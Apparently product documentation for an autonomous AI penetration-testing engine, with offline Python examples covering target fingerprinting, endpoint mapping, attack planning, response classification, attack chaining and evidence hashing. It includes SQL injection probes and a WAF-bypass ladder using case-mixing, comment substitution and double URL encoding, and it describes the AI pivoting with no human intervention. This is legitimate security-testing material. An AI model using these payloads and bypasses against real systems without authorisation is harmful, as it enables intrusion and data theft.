Stage 1: Target Analysis

Fingerprint before you fire

Before any attack payload is sent, the engine fingerprints the target: technology stack, server software, frameworks, WAF/CDN presence, TLS configuration, and application behaviour patterns. Every subsequent stage uses this profile to make informed decisions. One caveat a practitioner should keep in mind: Server and X-Powered-By headers are trivially rewritten, so a profile built from headers alone is a set of claims; framework cookie names, error-page formats and certificate details are the corroborating evidence that turns a claim into an observation.

Target Received
  |
  v
HTTP Header Analysis ---> Server/Framework ID
  |
  v
TLS Certificate Inspection ---> Cipher + Cert Chain
  |
  v
Technology Stack Detection ---> Language, CMS, DB hints
  |
  v
WAF/CDN Detection ---> Defensive posture mapped
  |
  v
DNS Enumeration ---> Infrastructure topology
  |
  v
Target Profile Complete ---> Pass to Stage 2
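The header, cookie and error-text part of this stage, as an added example that is not the engine's own code. It runs offline against a constructed response; the signature tables are small illustrative assumptions rather than the engine's library, and the point to notice is that header-derived hits are rated "claimed" while cookie names, WAF markers and error text are rated "observed" and override them.

```python
"""Stage 1 header/cookie/error-text fingerprinting (added example, offline)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Illustrative signature tables (assumption, not the engine's library).
SERVER_SIGS = {"apache": "Apache", "nginx": "nginx", "microsoft-iis": "IIS"}
COOKIE_SIGS = {"PHPSESSID": "PHP", "JSESSIONID": "Java servlet", "ASP.NET_SessionId": "ASP.NET",
               "csrftoken": "Django", "laravel_session": "Laravel (PHP)"}
WAF_HEADERS = {"cf-ray": "Cloudflare", "x-sucuri-id": "Sucuri", "x-akamai-transformed": "Akamai"}
DB_DRIVERS = {"mysql": "MySQL", "mysqli": "MySQL", "pg_": "PostgreSQL", "sqlsrv": "MSSQL"}


@dataclass
class Profile:
    server: Optional[str] = None
    language: Optional[str] = None
    database: Optional[str] = None
    waf: Optional[str] = None
    evidence: Dict[str, str] = field(default_factory=dict)  # why each field was set


def fingerprint(status: int, headers: List[Tuple[str, str]], body: str) -> Profile:
    """Build a Profile from one response. Headers are (name, value) pairs so
    repeated Set-Cookie lines survive. Anything taken from Server or
    X-Powered-By is recorded as 'claimed' (those headers are trivially
    rewritten); cookie names, WAF markers and error text are 'observed'
    and override a claim for the same field."""
    p = Profile()
    hdr, cookies = {}, []
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookies.append(value.split("=", 1)[0].strip())
        else:
            hdr[name.lower()] = value

    # Cheap but spoofable: Server / X-Powered-By
    for key in ("server", "x-powered-by"):
        val = hdr.get(key, "").lower()
        for needle, label in SERVER_SIGS.items():
            if needle in val and p.server is None:
                p.server, p.evidence["server"] = label, f"claimed via {key} header"
        if "php" in val and p.language is None:
            p.language, p.evidence["language"] = "PHP", f"claimed via {key} header"

    # Session cookie names are set by the framework itself
    for c in cookies:
        if c in COOKIE_SIGS:
            p.language, p.evidence["language"] = COOKIE_SIGS[c], f"observed cookie {c}"

    # WAF/CDN: response-header markers, or the classic 403 challenge page
    for h, label in WAF_HEADERS.items():
        if h in hdr:
            p.waf, p.evidence["waf"] = label, f"observed {h} header"
    if p.waf is None and status == 403 and re.search(r"attention required|cloudflare", body, re.I):
        p.waf, p.evidence["waf"] = "Cloudflare", "observed 403 challenge page"

    # PHP-style error text leaks the language and usually the DB driver
    m = re.search(r"(?:Warning|Fatal error): .*?\b(mysqli?|pg_|sqlsrv)", body, re.I)
    if m:
        drv = m.group(1).lower()
        p.database, p.evidence["database"] = DB_DRIVERS[drv], f"observed {drv} driver in error text"
        if p.language is None:
            p.language, p.evidence["language"] = "PHP", "observed PHP-style error text"
    return p


# Constructed response: Apache/PHP origin behind Cloudflare, leaking a mysqli warning.
SAMPLE_HEADERS = [
    ("Server", "Apache/2.4.57 (Ubuntu)"),
    ("X-Powered-By", "PHP/8.1.2"),
    ("CF-RAY", "8a1b2c3d4e5f6789-FRA"),
    ("Set-Cookie", "PHPSESSID=0123abcd; Path=/; HttpOnly"),
    ("Set-Cookie", "lang=en; Path=/"),
]
SAMPLE_BODY = ("<html>Warning: mysqli_connect(): (HY000/1045) Access denied "
               "for user 'app'@'localhost'</html>")

if __name__ == "__main__":
    print(fingerprint(200, SAMPLE_HEADERS, SAMPLE_BODY))
```

The evidence dictionary is what makes the profile useful downstream: a later stage can decide to trust "observed cookie PHPSESSID" more than "claimed via server header" when the two disagree.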

Inputs

  • Target URL / IP / hostname
  • Scope definition
  • Engagement type

Outputs

  • Technology fingerprint
  • WAF/CDN identification
  • TLS configuration
  • Infrastructure map

Real-World Example

The engine detects the target is running a PHP application on Apache with MySQL behind a Cloudflare WAF. This intelligence means every SQL injection payload will use MySQL syntax, every bypass technique will target Cloudflare-specific weaknesses, and PHP-specific vulnerability classes (deserialization, type juggling) are added to the attack plan.

Stage 2: Surface Mapping

Find every door before picking locks

The engine enumerates every attackable surface: endpoints, parameters, input vectors, authentication boundaries, and API contracts. Surfaces are prioritized by exploitability and business impact so the most critical paths are tested first.

Target Profile
  |
  v
Crawl Endpoints ---> Full URL inventory
  |
  v
Extract Parameters ---> Forms, JS, API responses
  |
  v
Hidden Path Discovery ---> Debug, admin, backup paths
  |
  v
Auth Boundary Mapping ---> Public vs. protected zones
  |
  v
API Schema Reconstruction ---> REST, GraphQL, WebSocket
  |
  v
Surface Map Complete ---> Prioritized by risk
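The parameter-extraction and auth-boundary steps above, as an added example that is not the engine's crawler. It takes one already-fetched page plus its script (both constructed here), pulls endpoints out of HTML forms and JavaScript fetch() calls, merges them into an inventory keyed by method and URL, and tags each entry with a zone and a hidden-path flag. The protected-path prefixes and the hidden-path keywords are assumed conventions for the sample, not rules from the page.

```python
"""Stage 2 surface extraction from one crawled page (added example, offline)."""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse


class FormExtractor(HTMLParser):
    """Collects <form> actions and every named input/select/textarea inside them."""

    def __init__(self, base):
        super().__init__()
        self.base, self.forms, self._cur = base, [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"url": urljoin(self.base, a.get("action") or self.base),
                         "method": (a.get("method") or "GET").upper(), "params": []}
            self.forms.append(self._cur)
        elif tag in ("input", "select", "textarea") and self._cur is not None and a.get("name"):
            self._cur["params"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


# fetch("<path>"[, {... method: "<verb>" ...}]) ; group 3 is the verb when present.
JS_CALL = re.compile(r"""fetch\(\s*["'`]([^"'`]+)["'`](\s*,\s*\{[^}]*?method\s*:\s*["'](\w+)["'])?""")


def js_endpoints(script, base):
    """fetch() targets in client-side JS; query-string keys become parameters."""
    out = []
    for path, _opts, method in JS_CALL.findall(script):
        url = urljoin(base, path)
        params = list(parse_qs(urlparse(url).query).keys())
        out.append({"url": url.split("?")[0], "method": (method or "GET").upper(), "params": params})
    return out


PROTECTED_PREFIXES = ("/admin", "/account", "/api/v1/users")   # assumed convention for the sample
HIDDEN_MARKERS = ("debug", "backup", ".bak", "/.git")            # assumed convention for the sample


def surface_map(html, script, base):
    """Merge both sources, de-duplicate by (method, url), tag zone and hidden paths.
    Hidden paths sort first so they are the first thing the planner sees."""
    fx = FormExtractor(base)
    fx.feed(html)
    merged = {}
    for e in fx.forms + js_endpoints(script, base):
        key = (e["method"], e["url"])
        merged.setdefault(key, {**e, "params": []})["params"].extend(e["params"])
    for e in merged.values():
        e["params"] = sorted(set(e["params"]))
        path = urlparse(e["url"]).path
        e["zone"] = "protected" if path.startswith(PROTECTED_PREFIXES) else "public"
        e["hidden"] = any(m in path for m in HIDDEN_MARKERS)
    return sorted(merged.values(), key=lambda e: (not e["hidden"], e["url"]))


# Constructed page and script for a hypothetical target.
BASE = "https://target.example/"
SAMPLE_HTML = """
<form action="/login" method="post">
  <input name="user"><input name="pass" type="password"><input type="submit" value="Go">
</form>
<form action="/search"><input name="q"></form>
"""
SAMPLE_JS = """
fetch("/api/v1/users?id=42&expand=roles", {method: "GET"}).then(r => r.json());
fetch('/api/v1/debug/config').then(r => r.text());
fetch("/api/v1/orders", {credentials: "include", method: "POST"});
"""


def demo():
    return surface_map(SAMPLE_HTML, SAMPLE_JS, BASE)


if __name__ == "__main__":
    for entry in demo():
        print(entry)
```

On a real crawl the same function is run per page and the results unioned; the (method, url) key is what keeps a form and a fetch() call to the same endpoint from producing two entries with half the parameters each.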

Inputs

  • Target profile from Stage 1

Outputs

  • Complete endpoint inventory
  • Parameter map
  • Auth boundary map
  • API schema

Real-World Example

Crawling reveals 342 endpoints. Parameter extraction identifies 89 unique input parameters across forms and API calls. Hidden path discovery finds /api/v1/debug/config returning a 200 with no authentication. This debug endpoint is immediately escalated to highest priority in the attack plan.

Stage 3: Attack Planning

Strategy before force

The AI creates a prioritized attack plan, selecting vulnerability classes that match the detected technology stack and ranking tests by severity and exploitability. The plan is not static — it is continuously revised as new intelligence arrives from later stages.

Surface Map + Profile
  |
  v
Select Vulnerability Classes ---> Matched to tech stack
  |
  v
Map Payloads to Parameters ---> Right payload, right target
  |
  v
Rank by Severity x Impact ---> Critical first
  |
  v
Apply Scope Constraints ---> Boundaries enforced
  |
  v
Attack Plan Ready ---> User confirms once, AI runs
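The four planning steps above, worked through as one added example that is not the engine's planner. A vulnerability class enters the queue only if its stack prerequisites appear in the Stage 1 profile, it is mapped onto parameters by parameter kind, each test is scored as severity x exploitability x an impact multiplier, and excluded paths never enter the queue at all. The class table, the weights, the parameter-kind heuristics and the sample surface are all assumptions for the sake of the example.

```python
"""Stage 3 attack planning: profile + surface -> ranked test queue (added example)."""
import re

# Illustrative class table (assumption). "needs": stack hints that make the class
# applicable; "kinds": which inputs it is mapped onto.
VULN_CLASSES = {
    "sqli":        {"needs": {"MySQL", "PostgreSQL", "MSSQL"}, "kinds": {"param", "path_param"},
                    "severity": 9.0, "exploitability": 0.7},
    "auth_bypass": {"needs": set(),   "kinds": {"login"},               "severity": 8.5, "exploitability": 0.5},
    "lfi":         {"needs": {"PHP"}, "kinds": {"path_param"},          "severity": 7.5, "exploitability": 0.6},
    "php_deser":   {"needs": {"PHP"}, "kinds": {"serialized"},          "severity": 9.5, "exploitability": 0.3},
    "xxe":         {"needs": {"XML"}, "kinds": {"param"},               "severity": 7.0, "exploitability": 0.4},
    "xss":         {"needs": set(),   "kinds": {"param", "path_param"}, "severity": 6.0, "exploitability": 0.6},
}
PATH_NAMES = {"file", "path", "page", "template", "include", "lang"}
PHP_SERIALIZED = re.compile(r"^(O|a):\d+:")   # leading token of PHP serialize() output


def param_kind(ep, name):
    """Classify an input by its name and, when the crawler saw one, its sample value."""
    if name.lower() in PATH_NAMES:
        return "path_param"
    if PHP_SERIALIZED.match(ep.get("samples", {}).get(name, "")):
        return "serialized"
    return "param"


def applicable(spec, stack):
    return not spec["needs"] or bool(spec["needs"] & stack)


def impact(ep):
    """Business-impact proxy: protected zones and hidden/debug paths weigh more."""
    return 1.5 if ep.get("zone") == "protected" or ep.get("hidden") else 1.0


def plan(profile, surface, scope):
    """profile['stack'] is the Stage 1 fingerprint, surface the Stage 2 endpoint
    list, scope['exclude_paths'] the URL prefixes that must never be touched."""
    queue = []
    for ep in surface:
        if any(ep["url"].startswith(x) for x in scope.get("exclude_paths", [])):
            continue                                   # scope enforced before anything is queued
        for vclass, spec in VULN_CLASSES.items():
            if not applicable(spec, profile["stack"]):
                continue                               # e.g. no XML parser seen -> XXE never queued
            score = round(spec["severity"] * spec["exploitability"] * impact(ep), 3)
            if "login" in spec["kinds"]:
                if ep.get("login"):
                    queue.append({"class": vclass, "url": ep["url"], "param": None, "score": score})
                continue
            for name in ep["params"]:
                if param_kind(ep, name) in spec["kinds"]:
                    queue.append({"class": vclass, "url": ep["url"], "param": name, "score": score})
    queue.sort(key=lambda e: (-e["score"], e["url"], e["param"] or ""))
    return queue


# Constructed inputs: a PHP/MySQL profile and a four-endpoint surface.
PROFILE = {"stack": {"Apache", "PHP", "MySQL"}}
SURFACE = [
    {"url": "/login", "method": "POST", "params": ["user", "pass"], "login": True, "zone": "public"},
    {"url": "/product", "method": "GET", "params": ["id", "page"], "samples": {"page": "home"}, "zone": "public"},
    {"url": "/account/prefs", "method": "POST", "params": ["state"], "zone": "protected",
     "samples": {"state": 'O:4:"Pref":1:{s:5:"theme";s:4:"dark";}'}},
    {"url": "/admin/legacy", "method": "GET", "params": ["q"], "zone": "protected"},
]
SCOPE = {"exclude_paths": ["/admin/legacy"]}

if __name__ == "__main__":
    for entry in plan(PROFILE, SURFACE, SCOPE):
        print(entry)
```

With these weights the queue opens with SQL injection on every database-backed parameter, LFI lands only on the path-like parameter, the deserialization test lands only on the field whose sample value looks like PHP serialize() output, and XXE does not appear because nothing in the profile says XML is parsed.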

Inputs

  • Target profile
  • Surface map
  • Engagement constraints

Outputs

  • Ranked attack queue
  • Per-parameter payload selections
  • Estimated timeline

Real-World Example

For a PHP/MySQL target, the AI prioritizes: (1) SQL injection on all database-backed parameters, (2) authentication bypass on login endpoints, (3) file inclusion on path parameters, (4) deserialization on serialized input fields. Generic checks like XML injection are deprioritized because no XML parsing was detected.

Stage 4: Execution

Controlled, captured, complete

The engine executes the attack plan autonomously, sending context-aware payloads at a rate-controlled pace. Every request-response pair is captured with full headers, body, and timing data. Session state and authentication tokens are maintained across tests.

Inputs

  • Attack plan
  • Target profile
  • Payload library

Outputs

  • Raw request/response pairs
  • Timing data
  • Error signatures
  • Partial hit signals

Stage 5: Result Analysis

Every response tells a story

Every response is analyzed for four possible outcomes: confirmed vulnerable (evidence captured), filter detected (WAF/input validation identified), partial signal (response differs from baseline in meaningful ways), or no signal (parameter tested, no indication of vulnerability). Partial signals are treated as leads and fed back into the loop.

Response Data
  |
  v
Status Code Analysis ---> 200/403/500/302 patterns
  |
  v
Error Message Parsing ---> Technology and filter clues
  |
  v
Content Diff ---> Baseline vs. test response
  |
  v
Timing Analysis ---> Blind/time-based detection
  |
  +--- Confirmed --------> Capture Evidence (Stage 9)
  +--- Filter Detected ---> Identify + Escalate (Stage 7)
  +--- Partial Signal ----> Refine + Retry (Stage 6)
  +--- No Signal ---------> Mark Tested, Continue
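The four-way classification above, as an added example that is not the engine's analyser. It takes a baseline response and a test response and returns one of the four outcomes with a reason. The check order is the security-relevant detail: backend error signatures are matched before the WAF signature so a leaked database error behind a 500 is not mis-filed as a filter hit, and a time-based blind hit is accepted even when the body is byte-identical to the baseline. Signature lists, thresholds and the sample responses are constructed assumptions.

```python
"""Stage 5 result analysis: baseline vs. test response -> outcome (added example)."""
import difflib
import re

CONFIRM_SIGS = [   # the payload demonstrably reached a backend component
    re.compile(r"You have an error in your SQL syntax", re.I),
    re.compile(r"mysqli?_(query|fetch)\(\)", re.I),
    re.compile(r"pg_query\(\)|unterminated quoted string", re.I),
    re.compile(r"failed to open stream|include\(\)", re.I),
]
FILTER_SIGS = [re.compile(r"attention required|request blocked|ModSecurity|incident id", re.I)]


def content_similarity(a, b):
    return difflib.SequenceMatcher(None, a, b).ratio()


def classify(baseline, test, *, time_payload=False, expected_delay=5.0, sim_threshold=0.9):
    """baseline/test: {'status', 'body', 'elapsed' (seconds)}.
    Returns (outcome, reason) with outcome in CONFIRMED/FILTER/PARTIAL/NO_SIGNAL."""
    body = test["body"]
    for sig in CONFIRM_SIGS:                       # 1. backend error text, checked first
        if sig.search(body) and not sig.search(baseline["body"]):
            return "CONFIRMED", f"backend error signature /{sig.pattern}/"
    delta = test["elapsed"] - baseline["elapsed"]  # 2. time-based blind
    if time_payload and delta >= 0.8 * expected_delay:
        return "CONFIRMED", f"response delayed {delta:.1f}s for a {expected_delay:.0f}s sleep payload"
    if test["status"] in (403, 406) and baseline["status"] != test["status"]:   # 3. filter
        for sig in FILTER_SIGS:
            if sig.search(body):
                return "FILTER", f"block page matched /{sig.pattern}/"
        return "FILTER", f"status changed to {test['status']} on payload"
    if test["status"] != baseline["status"]:       # 4. anything else that moved is a lead
        return "PARTIAL", f"status {baseline['status']} -> {test['status']}"
    sim = content_similarity(baseline["body"], body)
    if sim < sim_threshold:
        return "PARTIAL", f"body similarity {sim:.2f} below {sim_threshold}"
    return "NO_SIGNAL", f"body similarity {sim:.2f}"


# Constructed responses for a /product?id= probe.
BASELINE  = {"status": 200, "body": "<html><h1>Product 42</h1><p>Widget, $9.99</p></html>", "elapsed": 0.12}
SQL_ERROR = {"status": 500, "elapsed": 0.13,
             "body": "<html>Warning: mysqli_query(): You have an error in your SQL syntax near ''' at line 1</html>"}
WAF_BLOCK = {"status": 403, "body": "<html><title>Attention Required! | Cloudflare</title></html>", "elapsed": 0.05}
CHANGED   = {"status": 200, "body": "<html><h1>Product 42</h1><p>No results</p></html>", "elapsed": 0.12}
SAME      = {"status": 200, "body": BASELINE["body"], "elapsed": 0.11}
SLOW      = {"status": 200, "body": BASELINE["body"], "elapsed": 5.20}

if __name__ == "__main__":
    for name, resp in [("sql", SQL_ERROR), ("waf", WAF_BLOCK), ("changed", CHANGED), ("same", SAME)]:
        print(name, classify(BASELINE, resp))
    print("slow", classify(BASELINE, SLOW, time_payload=True))
```

The PARTIAL branch is deliberately loose: a status change or a body that drifts below the similarity threshold is not proof of anything, but it is exactly the lead the page says gets fed back into the loop.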

Stage 6: AI Pivot Decision

The strategic brain

This is the core of the "Never Give Up" engine. The AI evaluates every new finding and decides the optimal next action: deep-dive on the same surface, lateral pivot to similar surfaces, chain pivot to combine findings, escalation pivot to test for higher impact, or technology pivot when new tech is discovered. No human intervention required.

See full AI Pivot Logic documentation →

Stage 7: Payload Adaptation

Craft, don't copy

When a filter or WAF blocks a payload, the engine does not give up. It identifies the filter type, selects the appropriate bypass level, generates an adapted payload, applies encoding layers, and retries. Eight escalation levels ensure every known bypass technique is attempted before marking a parameter as exhausted.

See full Payload Adaptation documentation →

Stage 8: Chain Building

Impact through combination

Individual findings are correlated and linked into multi-step attack chains. An SSRF finding combined with internal service discovery becomes a potential RCE path. An information disclosure combined with an authentication bypass becomes full account takeover. The AI validates each chain step to ensure the full path is executable.
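The two chains named above (SSRF to RCE, disclosure plus auth bypass to account takeover), worked as an added example that is not the engine's attack-graph code. Findings are edges with preconditions and post-conditions, a breadth-first search over the set of capabilities gained so far returns the shortest chain to a goal, and a second pass re-validates each step in order with a caller-supplied oracle so a chain is only reported if every link is executable from what the earlier links actually produced. The findings are constructed.

```python
"""Stage 8 chain building as capability-graph search (added example)."""
from collections import deque

# Constructed findings: what each one needs and what it yields.
FINDINGS = [
    {"id": "F1", "title": "SSRF in /api/fetch?url=",            "requires": set(),               "provides": {"internal_http"}},
    {"id": "F2", "title": "Unauthenticated internal admin API", "requires": {"internal_http"},   "provides": {"internal_admin"}},
    {"id": "F3", "title": "Admin API loads arbitrary plugin",   "requires": {"internal_admin"},  "provides": {"rce"}},
    {"id": "F4", "title": "Verbose error leaks user emails",    "requires": set(),               "provides": {"valid_usernames"}},
    {"id": "F5", "title": "Password reset accepts any token",   "requires": {"valid_usernames"}, "provides": {"account_takeover"}},
    {"id": "F6", "title": "Reflected XSS in /search",           "requires": set(),               "provides": {"client_script"}},
]


def build_chains(findings, goal, start=frozenset()):
    """BFS over capability sets. A state is the frozenset of capabilities held so
    far; applying a finding whose requirements are met adds what it provides.
    Returns the shortest ordered list of finding ids that yields `goal`, or None."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        caps, path = queue.popleft()
        if goal in caps:
            return path
        for f in findings:
            if f["id"] in path or not f["requires"] <= caps:
                continue
            nxt = frozenset(caps | f["provides"])
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [f["id"]]))
    return None


def validate_chain(chain, findings, oracle):
    """Re-check each step in order. `oracle(finding, caps)` is the live re-test
    (here supplied by the caller); the chain fails at the first step whose
    requirements are not met or whose oracle says it no longer works."""
    by_id = {f["id"]: f for f in findings}
    caps = set()
    for fid in chain:
        f = by_id[fid]
        if not f["requires"] <= caps or not oracle(f, caps):
            return False, fid
        caps |= f["provides"]
    return True, None


def describe(chain, findings):
    by_id = {f["id"]: f["title"] for f in findings}
    return " -> ".join(by_id[fid] for fid in chain)


if __name__ == "__main__":
    for goal in ("rce", "account_takeover", "domain_admin"):
        chain = build_chains(FINDINGS, goal)
        print(goal, ":", describe(chain, FINDINGS) if chain else "no chain")
```

The `seen` set is keyed on the capability set rather than on the path, so two orderings that reach the same state are explored once; the BFS order is what guarantees the reported chain is the shortest, which is also the easiest one to narrate in the report.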

See full Attack Graph documentation →

Stage 9: Evidence Collection

Forensic-grade proof

Every confirmed finding receives a complete evidence package: raw HTTP request, raw HTTP response, extracted data, timing information, SHA-256 hash, RFC 3161 timestamp, and a copy-paste reproducible PoC script. The package is hashed with SHA-256 at capture time and that hash is bound to a trusted time source with an RFC 3161 timestamp token, so any later alteration of the evidence is detectable and the moment of capture can be demonstrated to a third party.
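The integrity part of this package, as an added example that is not the engine's evidence code. Each capture is serialised to canonical JSON, hashed with SHA-256 and linked to the previous capture's hash, so editing any field breaks verification from that record onward; a PoC line is rebuilt from the captured raw request. RFC 3161 timestamping needs a live Time Stamping Authority, so the block stops at the digest a TimeStampReq would carry in its messageImprint. The two captures are constructed and use fixed timestamps so the hashes are reproducible.

```python
"""Stage 9 evidence packaging: canonical JSON, SHA-256, hash chain, PoC line (added example)."""
import hashlib
import json
import shlex
from datetime import datetime, timezone


def canonical(obj):
    """Deterministic bytes: sorted keys, no whitespace. Same record -> same hash anywhere."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":"), ensure_ascii=False).encode("utf-8")


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


class EvidenceChain:
    GENESIS = "0" * 64

    def __init__(self):
        self.records = []

    def capture(self, finding_id, request, response, extracted, elapsed, captured_at=None):
        """Freeze one request/response pair. prev_hash links it to the previous capture."""
        prev = self.records[-1]["hash"] if self.records else self.GENESIS
        body = {
            "finding_id": finding_id,
            "request": request,            # raw request text exactly as sent
            "response": response,          # raw response text exactly as received
            "extracted": extracted,        # what the payload pulled out
            "elapsed_s": elapsed,
            "captured_at": (captured_at or datetime.now(timezone.utc)).isoformat(),
            "prev_hash": prev,
        }
        rec = {"body": body, "hash": sha256_hex(canonical(body))}
        self.records.append(rec)
        return rec

    def verify(self):
        """Recompute every hash and every back-link. Returns (ok, index_of_first_bad)."""
        prev = self.GENESIS
        for i, rec in enumerate(self.records):
            if rec["body"]["prev_hash"] != prev or sha256_hex(canonical(rec["body"])) != rec["hash"]:
                return False, i
            prev = rec["hash"]
        return True, None

    def timestamp_request_digest(self):
        """Digest of the chain head: what an RFC 3161 TimeStampReq messageImprint
        would carry to the TSA (assumed workflow; the TSA round-trip is not shown)."""
        return self.records[-1]["hash"] if self.records else None


def poc_script(rec):
    """Copy-paste curl reproduction rebuilt from the captured raw request."""
    request_line, _, rest = rec["body"]["request"].partition("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = [h for h in rest.split("\r\n\r\n", 1)[0].split("\r\n") if h]
    host, flags = "target", []
    for h in headers:
        if h.lower().startswith("host:"):
            host = h.split(":", 1)[1].strip()
        else:
            flags.append("-H " + shlex.quote(h))
    return " ".join(["curl", "-s", "-X", method, *flags, shlex.quote(f"https://{host}{path}")])


def build_demo_chain():
    """Two constructed captures for one finding, with fixed timestamps."""
    chain = EvidenceChain()
    t0 = datetime(2024, 5, 1, 12, 0, 0, tzinfo=timezone.utc)
    chain.capture("SQLI-001",
                  "GET /product?id=42%27%20OR%201%3D1-- HTTP/1.1\r\nHost: shop.example\r\n"
                  "User-Agent: example-scanner/1.0\r\n\r\n",
                  "HTTP/1.1 500 Internal Server Error\r\n\r\nYou have an error in your SQL syntax",
                  {"db_error": "You have an error in your SQL syntax"}, 0.131, t0)
    chain.capture("SQLI-001",
                  "GET /product?id=42%20AND%20SLEEP(5)-- HTTP/1.1\r\nHost: shop.example\r\n\r\n",
                  "HTTP/1.1 200 OK\r\n\r\n<html>Product 42</html>",
                  {"delay_s": 5.07}, 5.19, t0)
    return chain


if __name__ == "__main__":
    c = build_demo_chain()
    print(c.verify(), c.timestamp_request_digest())
    print(poc_script(c.records[0]))
```

The hash chain alone only proves the records have not changed relative to each other; it is the external timestamp on the head hash (or a signature with a key the engine controls) that lets a reader outside the engagement trust when the chain was frozen.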

See full Evidence Chain documentation →

Stage 10: Report Generation

Professional prose, not data dumps

The AI writes professional penetration test reports: executive summaries for business audiences, technical findings with CVSS scores and evidence, attack chain narratives showing step-by-step exploitation, specific remediation guidance, compliance mapping, and a full evidence appendix. Reports are generated in PDF and HTML formats.

Report Sections

  • Executive Summary
  • Technical Findings
  • Attack Chain Narratives
  • Remediation Plan
  • Compliance Mapping
  • Evidence Appendix

Output Formats

  • PDF (professional layout)
  • HTML (interactive)
  • JSON (machine-readable)
  • CSV (finding export)

The Loop: Why Stages 5–7 Are Continuous

Stages 5 (Result Analysis), 6 (AI Pivot Decision), and 7 (Payload Adaptation) form a continuous inner loop. For every parameter on every endpoint, this cycle repeats until the parameter reaches one of two terminal states:

Terminal State | Meaning                                         | Report Treatment
CONFIRMED      | Vulnerability confirmed with evidence           | Full finding write-up with PoC, evidence, CVSS, remediation
EXHAUSTED      | Every known technique attempted, none confirmed | Documented as "tested thoroughly" with full attempt history

Critical distinction: EXHAUSTED is NOT "not vulnerable." It means "we tried every known approach and could not confirm." The full attempt history is included in the report, showing the client exactly how thoroughly each parameter was tested.
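The inner loop and the two terminal states, together with the escalation ladder from Stage 7, as one added example that is not the engine's code. A raw payload is pushed through successive transformations until a response classifies as CONFIRMED, or the ladder is used up and the parameter is marked EXHAUSTED; either way the full attempt history is returned, which is what the report prints. The five rungs here are illustrative (the page's eight levels are not enumerated), and the two filters and the target behind them are constructed stand-ins: one decodes once and keys on a keyword followed by whitespace, the other decodes until stable and normalises inline comments first.

```python
"""Stages 5-7 as one loop: escalate until CONFIRMED or EXHAUSTED (added example)."""
import re
from urllib.parse import quote, unquote

RAW_PAYLOAD = "' OR 1=1"   # constructed boolean-based SQLi probe


# Illustrative escalation rungs (assumption): each is a transform of the raw payload.
def _case_mix(p):
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))


def _comment_for_space(p):             # MySQL treats /**/ as whitespace
    return re.sub(r"\s+", "/**/", p)


def _url_encode(p):
    return quote(p, safe="")


def _double_url_encode(p):
    return quote(quote(p, safe=""), safe="")


LADDER = [("raw", lambda p: p), ("case-mix", _case_mix), ("comment-for-space", _comment_for_space),
          ("url-encode", _url_encode), ("double-url-encode", _double_url_encode)]


def naive_filter(value):
    """Constructed WAF stand-in: one URL-decode, then keyword-plus-whitespace."""
    decoded = unquote(value)
    return bool(re.search(r"\b(or|union|select)\b\s", decoded, re.I))


def strict_filter(value):
    """Constructed stricter stand-in: decode until stable, normalise comments, then same rule."""
    prev, cur = None, value
    while prev != cur:
        prev, cur = cur, unquote(cur)
    return naive_filter(cur.replace("/**/", " "))


def make_target(waf):
    """Constructed target: a WAF in front of a page that leaks a MySQL error
    when the once-decoded value carries an unbalanced quote."""
    def send(value):
        if waf(value):
            return {"status": 403, "body": "Request blocked"}
        if "'" in unquote(value):
            return {"status": 500, "body": "You have an error in your SQL syntax"}
        return {"status": 200, "body": "OK"}
    return send


def detect(resp):
    """Stage 5 reduced to the outcomes this loop acts on."""
    if "SQL syntax" in resp["body"]:
        return "CONFIRMED"
    if resp["status"] == 403:
        return "FILTER"
    return "NO_SIGNAL"


def probe(raw_payload, send, detect=detect, ladder=LADDER):
    """Walk the ladder; stop on CONFIRMED, otherwise EXHAUSTED after the last rung.
    Every attempt is kept: EXHAUSTED reports what was tried, not 'not vulnerable'."""
    history = []
    for level, transform in ladder:
        value = transform(raw_payload)
        outcome = detect(send(value))
        history.append({"level": level, "value": value, "outcome": outcome})
        if outcome == "CONFIRMED":
            return "CONFIRMED", history
    return "EXHAUSTED", history


if __name__ == "__main__":
    for name, waf in (("naive", naive_filter), ("strict", strict_filter)):
        state, history = probe(RAW_PAYLOAD, make_target(waf))
        print(name, state)
        for h in history:
            print("   ", h["level"], "->", h["outcome"], repr(h["value"]))
```

Against the naive filter the third rung gets through and the loop stops with three attempts on record; against the strict filter every rung is blocked and the parameter ends EXHAUSTED with all five attempts recorded, which is the attempt history the report treats as "tested thoroughly" rather than as proof of absence.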